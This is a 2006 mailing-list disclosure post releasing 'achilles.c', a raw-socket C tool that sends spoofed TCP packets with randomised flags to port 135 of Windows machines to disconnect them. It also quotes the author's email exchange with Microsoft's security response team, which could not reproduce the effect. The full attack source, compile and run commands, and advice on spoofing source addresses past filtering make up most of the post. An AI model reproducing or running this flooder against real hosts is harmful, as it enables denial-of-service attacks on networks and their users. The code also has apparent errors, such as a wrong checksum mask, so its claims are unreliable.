<<< Date Index >>>     <<< Thread Index >>>

Windows XP/NT/SMB2003/2000 Denial of Service attack



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1


According to Microsoft the following tool does nothing to Windows
based machines. According to my experience it does. According to
the experience of 5 separate administrators it does as well. You be
the judge of this. Initially this is/was a tool called bubonic.c
which was modified for some IDS testing on a Cisco ASA5520 so the
tool is a sort of re-post of sorts. Some of the flags were modified
and more ranDUMBness introduced.

The attack was done locally and remotely. Locally this is/was my
setup @ home:

Workstations:
Windows XP Professional Pentium Centrino Laptop
FreeBSD 6.1 Pentium M Laptop
Solaris 10 / Sunfire 280r

Networking:
Cisco 2624
Cisco 3640
Cisco 2970
3Com Superstack
Motorola Surfboard @ 10mb down 3mb up

compiled:

gcc -o achilles achilles.c

(LOCAL ATTACK)
./achilles 10.10.10.4 205.205.205.255 1 1

Remotely it was sent with the same settings and the results were
the same. The targets were two boxes, one on a T3 and the other set
up for me on a DS3 connection in which I sent the attack from my
home to both machines and the results were the same as well. I had
to change the address for the attack though and spoof it from one
of my websites to avoid RFC1918 filtering.

Keep in mind the random() calls which I know offhand will change.
Try it once, try it twice. I've gotten it to work for me every
given time, two testers stated they'd gotten even odder results.
Anyhow, since MS stated they found nothing they won't mind their
write up being quoted on this.


/*
 * Achilles.c version2
 * Remodified Achilles Windows Attack Tool
 * compiled on FreeBSD 6.1, SuSE 10
 * Solaris 10, NetBSD 3.0,
 * Proof of Concept tool that disconnects
 * Windows machines until the program is
 * stopped. Tested locally and remotely.
 *
 * linux:~ # uname -a
 * Linux linux 2.6.13-15.10-default #1 Fri May 12 16:27:12 UTC 2006
i386 GNU/Linux
 *
 * $ uname -a
 * SunOS unknown 5.10 Generic_118822-25 sun4u sparc SUNW,Sun-Fire-
280R
 *
 * -bash2-2.05b$ uname -a
 * FreeBSD hypnos 5.4-RELEASE-p14 FreeBSD 5.4-RELEASE-p14 #1: Thu
May 11 01:34:54 CDT 2006
toor@hypnos:/usr/obj/usr/src/sys/HYPNOS  i386
 *
 * (c) 2006 J. Oquendo Genexsys.net::Infiltrated.net
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <strings.h>
#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>

#ifndef __USE_BSD
#define __USE_BSD

#endif

#ifndef __FAVOR_BSD

#define __FAVOR_BSD

#endif

#include <netinet/in_systm.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>
#include <netdb.h>

#ifdef LINUX
#define FIX(x) htons(x)

#else

#define FIX(x) (x)
#endif

struct ip_hdr {
    u_int ip_hl:4,
                ip_v:4;
    u_char ip_tos;
    u_short ip_len;
    u_short ip_id;
    u_short ip_off;
    u_char ip_ttl;
    u_char ip_p;
    u_short ip_sum;
    u_long saddr, daddr;
};

struct tcp_hdr {
    u_short th_sport;
    u_short th_dport;
    u_long th_seq;
    u_long th_syn;
    u_int th_x2:4,
                th_off:4;
    u_char th_flags;
    u_short th_win;
    u_short th_sum;
    u_short th_urp;
};

struct tcpopt_hdr {
    u_char type;
    u_char len;
    u_short value;
};

struct pseudo_hdr {
    u_long saddr, daddr;
    u_char mbz, ptcl;
    u_short tcpl;
};

struct packet {
    struct ip/*_hdr*/ ip;
    struct tcphdr tcp;
};

struct cksum {
    struct pseudo_hdr pseudo;
    struct tcphdr tcp;
};

struct packet packet;
struct cksum cksum;
struct sockaddr_in s_in;
u_short bgport, bgsize, pps;
u_long radd;
u_long sradd;
int sock;

void usage(char *progname)
{
    fprintf(stderr, "Usage: %s <dst> <src> <size> <number>\n",
progname);
    fprintf(stderr, "dst:\tDestination Address\n");
    fprintf(stderr, "src:\tSource Address\n");
    fprintf(stderr, "size:\tSize of packet\n");
    fprintf(stderr, "num:\tpackets\n\n");
    exit(1);
}

inline u_short in_cksum(u_short *addr, int len)
{
    register int nleft = len;
    register u_short *w = addr;
    register int sum = 0;
    u_short answer = 0;
     while (nleft > 1) {
         sum += *w++;
         nleft -= 2;
     }
     if (nleft == 1) {
         *(u_char *)(&answer) = *(u_char *) w;
         sum += answer;
     }
     sum = (sum >> 16) + (sum & 0xF0F0);
     sum += (sum >> 16);
     answer = ~sum;
     return(answer);
}

u_long lookup(char *hostname)
{
    struct hostent *hp;

    if ((hp = gethostbyname(hostname)) == NULL) {
       fprintf(stderr, "Could not resolve %s\n", hostname);
       exit(1);
    }

    return *(u_long *)hp->h_addr;
}

void flooder(void)
{
    struct timespec ts;
    int i;

    memset(&packet, 0, sizeof(packet));

    ts.tv_sec = 0;
    ts.tv_nsec = 100;

    packet.ip.ip_hl = 5;
    packet.ip.ip_v = 4;
    packet.ip.ip_p = IPPROTO_TCP;
    packet.ip.ip_tos = 0xa0;
    packet.ip.ip_id = radd;
    packet.ip.ip_len = FIX(sizeof(packet));
    packet.ip.ip_off = 0;
    packet.ip.ip_ttl = 255;
    packet.ip.ip_dst.s_addr = radd;

    packet.tcp.th_flags = 0;
    packet.tcp.th_win = 65535;
    packet.tcp.th_seq = random();
    packet.tcp.th_ack = 0;
    packet.tcp.th_off = random();
    packet.tcp.th_urp = 0;
    packet.tcp.th_dport = 135;
    cksum.pseudo.daddr = sradd;
    cksum.pseudo.mbz = random(); /* WATCH ME CLOSELY */
    cksum.pseudo.ptcl = IPPROTO_TCP;
    cksum.pseudo.tcpl = random();

    s_in.sin_family = AF_INET;
    s_in.sin_addr.s_addr = sradd;
    s_in.sin_port = 135;

    for(i=0;;++i) {
    if( !(i&31337) ) {
        packet.tcp.th_sport = 135;
        cksum.pseudo.saddr = packet.ip.ip_src.s_addr = sradd;
        packet.tcp.th_flags = random();
        packet.tcp.th_ack = random();

    }
    else {
        packet.tcp.th_flags = rand();
        packet.tcp.th_ack = rand();
    }
       ++packet.ip.ip_id;
       /*++packet.tcp.th_sport*/;
       ++packet.tcp.th_seq;

       if (!bgport)
          s_in.sin_port = packet.tcp.th_dport = 135;

       packet.ip.ip_sum = 0;
       packet.tcp.th_sum = 0;

       cksum.tcp = packet.tcp;

       packet.ip.ip_sum = in_cksum((void *)&packet.ip, 20);
       packet.tcp.th_sum = in_cksum((void *)&cksum, sizeof(cksum));

       if (sendto(sock, &packet, sizeof(packet), 0, (struct
sockaddr *)&s_in, sizeof(s_in)) < 0);

    }
}

int main(int argc, char *argv[])
{
    int on = 1;

    printf("Achilles.c Windows Attack Tool\n");


    if ((sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
       perror("socket");
       exit(1);
    }

    setgid(getgid()); setuid(getuid());

    if (argc < 4)
       usage(argv[0]);

    if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on,
sizeof(on)) < 0)

{
       perror("setsockopt");
       exit(1);

    }

    srand((time(NULL) ^ getpid()) + getppid());

    printf("\nFinding host\n"); fflush(stdout);

    radd = lookup(argv[1]);
    bgport = atoi(argv[3]);
    bgsize = atoi(argv[4]);
    sradd = lookup(argv[2]);
    printf("Achilles: Before my time is done I will look down on
your corpse and smile.\n");

    flooder();

    return 0;
}



From:  "J. Oquendo" <joquendo@xxxxxxxxxxxx>
To:  Microsoft Security Response Center <secure@xxxxxxxxxxxxx>
Date:  Sat, 08 Jul 2006 22:16:24 -0400
This message is not encrypted, and is not digitally signed by
"joquendo@xxxxxxxxxxxx" <joquendo@xxxxxxxxxxxx> .
On Sat, 08 Jul 2006 17:47:05 -0400 Microsoft Security Response
Center <secure@xxxxxxxxxxxxx> wrote:
>Hello,
>
>I wanted to give you a brief update with regards to our status on
>your
>case. While I did see your post on Slashdot including snippets of
>our
>earlier correspondence mentioning that you have been able to repro
>this
>issue on multiple occasions, we unfortunately have not been
>successful
>in our attempts.

Thanks for responding back a second time around. I saw your first
email but laughed it off. I debated on whether or not to release it
because I know it works. Heck I just finished telling and SHOWING
my new coworkers the attack and offered an explanation of it to
them. Know something... Still worked for me. I also mentioned to
one coworker how you guess tested it with FreeBSD under VMWare and
the thought was there could be an issue with VMWare's take on the
networking stack...

>We also could not identify from the provided TCPDump info any
>distinct
>connection attempts to port 135 that would result in a Denial of
>Service.  Our investigation which has included code review, review
>of
>the TCPDump, and attempts on reproing the issue on multiple fresh
>installs of various Windows Operating Systems have all resulted in
>non
>confirmation. We have also not been able to identify any of the
>"odder
>things" that you mentioned earlier.

Could be one of two things... Firstly the initial program was
written to break BGP routing so I issued the destport to 179. Then
I wanted to tinker with my IDS at the same time so I set it to
random()... Then I set one to MSRPC so you might have gotten the
random() of which the coding is still the same. Now to be even more
ironic about the whole thing, the version I showed to my coworkers
targeted guess what? Random ports and still shut my MS machine down
at will.

>If you believe there are any additional details or information
>that
>would better help illustrate the issue I would gladly use it to
>further
>the push the investigation with the engineering teams.  Otherwise
>I will
>close the case with our current status and findings to date. One
>question that I have is the target host that is exhibiting the
>issue a
>fresh install of the OS?

You guys say you can't find anything on it, then there should be no
issues with me releasing it along with mention of you guys finding
no reason to be weary of the tool. I'm sure you guys might want to
do some further investigation else it would look pretty ridiculous
for MS not to be able to find issues while everyone else on say
Bugtraq scratches their heads on MS' miscues. Instead of trying to
exploit in under FreeBSD under VMWare, try it on a dedicated
FreeBSD machine. Heck try it under Linux the code is portable.

>My apologies for the delay since our last correspondence, but I
>have
>wanted to ensure that we have pursued every avenue before coming
>back to
>with this conclusion.

No apologies needed. I kind of shrugged it off a long time ago. You
guys say you can't replicate it yet I can whenever I run it. I'm
just curious if others would be able to as well. So far I have had
about 5 trusted sources test it conclusively. All results were the
same. My qualm is that of... Do the script kiddiots need another
idiotic DoS toy? Not really, but at the same time I stay shaking my
head in disbelief you guys can't find nothing while I can break
Windows 2000, 2003SMB, XP at will.

>
>Best regards,
>
>Adrian
>Microsoft Security Response Center

>-----Original Message-----
>From: J. Oquendo [mailto:joquendo@xxxxxxxxxxxx]
>Sent: Tuesday, May 23, 2006 6:22 PM
>To: Microsoft Security Response Center
>Subject: RE: Security Vulnerability Report [6588as]
>
>-----BEGIN PGP SIGNED MESSAGE-----
>Hash: SHA1
>
>Adrian, here is a link for a two second packet dump from the BSD
>machine sending out packets. http://xxx.xxx.xxx.xxx:905/ach.dump An
>attachment would have been too big to send. Unsure what you guys
>see but here were the flags I used when compiling and sending the
>attack...
>
>gcc -o achilles achilles.c
>
>./achilles 10.1.1.2 192.168.1.2 1 1
>
>The 10.1.1.2 is obviously whatever I want it to be and the 192 is
>the victim host. Yes it can be sent to a remote machine as well.
>Provided the remote host is not firewalled, the results are the
>same.
>
>If your concerns are solely a "Denial of Service" via resource
>flood, you're semi mistaken... While the specified MSRPC port is
>exhausted, this should not stop your Windows machines from
>accepting in and outbound connections. Also a Denial of Service
>(via resource exhaustion) has already been covered by testing this
>on a colo'd machine where my connection was a fragment of the
>attacked machine. Meaning... Attacking machine was a DSL based
>machine with no more than a 2MBPS attacking a T3 colo'd machine
>45MBPS and again... The results were the same. Remote host stopped
>all in and outbound connections until I ceased...
>
>There should be another concern that someone there at Microsoft
>may
>want to note... If I change the program to accept random settings
>using SYN or URG flags, and random TCP codes, even odder things
>happen. Being so many different packets are going through the
>wire,
>its difficult to pinpoint which is doing what. ... Anyhow that
>dump
>was killed after 2 seconds. A heck of a lot of packets being
>pushed.
>
>On Tue, 23 May 2006 19:23:37 -0400 Microsoft Security Response
>Center <secure@xxxxxxxxxxxxx> wrote:
>>Thank you for the update with regards to your findings. We are
>>still
>>going through the repro stages of the case and there appears to
>be
>>some
>>confusion over the concern. Do you happen to have a network trace
>>of the
>>behavior that I could work with our development teams in
>reviewing
>>to
>>ensure that we are looking at the same concern and avoid any
>>possible
>>confusion on the matter?
>>
>>
>>Thanks,
>>
>>Adrian
>>Microsoft Security Response Center
>>-----Original Message-----
>>From: J. Oquendo [mailto:joquendo@xxxxxxxxxxxx]
>>Sent: Tuesday, May 23, 2006 1:13 PM
>>To: Microsoft Security Response Center
>>Subject: RE: Security Vulnerability Report [6588as]
>>
>>-----BEGIN PGP SIGNED MESSAGE-----
>>Hash: SHA1
>>
>>Just to inform you, I have also tested this from my home to a
>>remote
>>location that is colocated on a T3 connection and the result was
>>the
>>same. I was able to break connectivity to the machine from a
>1.5mb
>>DSL
>>connection to a T3. The attack was halted when firewall rules
>were
>>in
>>place.
>>-----BEGIN PGP SIGNATURE-----
>>Note: This signature can be verified at
>>https://www.hushtools.com/verify
>>Charset: UTF8
>>Version: Hush 2.5
>>
>>wpwEAQECAAYFAkRzbLoACgkQVnroYexO+HLb5QP+Kh/uLH316Hpb3Gvyl1dBlqeGOo
>B
>>X
>>/3BYWHHau0wINp7dvKKSkq1qLkaGDiXn14yqPIOTvw90mrtBQut5nebCFYRiaakui3
>6
>>t
>>xQ7qv9RRll5vG7QUYGBhWIcLBzvcs+ck0ZhRjv9xJS2QsrdlOztDOpYjZggsAYF8Df
>2
>>E
>>IbpNHoM=
>>=o8z1
>>-----END PGP SIGNATURE-----
>>
>>
>>
>>
>>Concerned about your privacy? Instantly send FREE secure email,
>no
>>account required http://www.hushmail.com/send?l=480
>>
>>Get the best prices on SSL certificates from Hushmail
>>https://www.hushssl.com?l=485
>-----BEGIN PGP SIGNATURE-----
>Note: This signature can be verified at
>https://www.hushtools.com/verify
>Charset: UTF8
>Version: Hush 2.5
>
>wpwEAQECAAYFAkRztVIACgkQVnroYexO+HLGwAQApDSVKJ1E7WbZjg5M90yWIz4oFJP
>M
>1yQKNG0DchZ0bv//OXN3FiaHrh7S4iUO+dlSLLeHvUCIzG3+8oDHswo47miElprnhFL
>i
>lCNDVIKXPnBWZgMLI170AGT7htNrgtwUF4tOT24bK90Pe1XqjObqmgOMA1l3ceOmIx/
>y
>oEL/Ovk=
>=Gs59
>-----END PGP SIGNATURE-----
>
>
>
>
>Concerned about your privacy? Instantly send FREE secure email, no
>account required
>http://www.hushmail.com/send?l=480
>
>Get the best prices on SSL certificates from Hushmail
>https://www.hushssl.com?l=485


perl -e 'print $i=pack(c5,(40*2),sqrt(7600),(unpack(c,Q)-3+1+3+3-
7),oct(104),10,oct(101));'
-----BEGIN PGP SIGNATURE-----
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 2.5

wpwEAQECAAYFAkTFGa0ACgkQVnroYexO+HLp2QP/Zj64NM76o6SJrHxC02n4B2r6DzoJ
sO5d1seHzAF3zd1w7/6VQ/pjHsc1dp8avGkWIoY38CW/U8knArXhra8W//Tn1FzeiKqZ
cGVM0tquO3t/3ZQzpoUR0ZX/2N9tfwVmIf0WAxrlyCQlIb9dAYOta/Rfl/vcG42g3vy9
+XOgXE8=
=AOun
-----END PGP SIGNATURE-----




Concerned about your privacy? Instantly send FREE secure email, no account 
required
http://www.hushmail.com/send?l=480

Get the best prices on SSL certificates from Hushmail
https://www.hushssl.com?l=485